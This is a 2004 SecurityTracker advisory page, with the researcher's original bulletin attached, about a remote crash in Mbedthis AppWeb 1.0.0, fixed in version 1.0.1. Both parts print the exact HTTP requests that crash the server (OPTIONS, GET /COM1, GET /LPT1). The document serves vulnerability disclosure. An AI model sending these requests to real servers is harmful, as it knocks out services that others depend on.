SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Mbedthis AppWeb Vendors:   Mbedthis Software
Mbedthis AppWeb Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1008848
SecurityTracker URL:  http://securitytracker.com/id/1008848
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Feb 3 2004
Original Entry Date:  Jan 26 2004
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.0.0
Description:   Ziv Kamir of Global Security Solution IT (GSSIT) reported a vulnerability in the Mbedthis AppWeb web server software. A remote user can crash the web service.

It is reported that a remote user can send any of the following types of HTTP requests to the target server to cause the web service to crash:

OPTIONS

GET /COM1 HTTP/1.0

GET /LPT1 HTTP/1.0

The vendor was reportedly notified on January 25, 2004.

Impact:   A remote user can cause the web service to crash.
Solution:   The vendor has issued a fixed version (1.0.1), available at:

http://www.mbedthis.com/downloads/appWeb/info.php
http://www.mbedthis.com/downloads/appWeb/index.html

Vendor URL:  www.mbedthis.com/products/appWeb/index.html (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (NT), Windows (95), Windows (98), Windows (2000)
Underlying OS Comments:  Vendor notes that Windows 95, 98, and 2000 are not officially supported platforms and that Windows XP and Windows 2003 are not affected.

Message History:   None.


 Source Message Contents

Subject:  Mbedthis AppWeb


This is a multi-part message in MIME format.
--------------070409000304090204010105
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit




------------------------------------------------------------------------
Do you Yahoo!?
Yahoo! SiteBuilder - Free web site building tool. *Try it!*
<http://us.rd.yahoo.com/evt=21608/*http://webhosting.yahoo.com/ps/sb/>



--------------070409000304090204010105
Content-Type: text/plain;
 name="AppWeb.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="AppWeb.txt"

26/01/04


====================================
 GSSIT - Global Security Solution IT
====================================		

-------------------------------------------------------

Application: Mbedthis AppWeb
Web Site:    http://www.mbedthis.com
Versions:    1.0.0
Platform:    Tested On win2k
Bug :        D.O.S
             
                           
Credits:
########

#########################################
#         ==  Ziv Kamir ==              #
#                                       #
# GSSIT - Global Security Solution IT   #                   
#                                       #
#     Email : gss_it@yahoo.com          #
#                                       #
#                                       #
#########################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


================
1) Introduction
================

Mbedthis AppWeb is the first embedded web server that has been designed 
from the start with security in mind. It is a very fast, small-footprint,
standards based server specifically developed for use by applications and embedded devices. 


=======
2) Bug
=======


A remote user can Crash the WEb Server




===========
3) The Code
===========

a remote user can send the following requests to Crash The Server :

1) OPTIONS

2) GET /COM1 HTTP/1.0
  
3) GET /LPT1 HTTP/1.0




======
4) Fix
======

Date of Vendor Notification:
----------------------------

25/01/04

Response:
---------

Thanks for the feedback,


==============================================================================================

                 *** The Data is for educational purpose only. *** 

          The information in this bulletin is provided "AS IS" without 
          warranty of any kind. In no event shall we be liable for any 
          damages whatsoever including direct, indirect, incidental, 
          consequential, loss of business profits or special damages. 

==============================================================================================

--------------070409000304090204010105--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC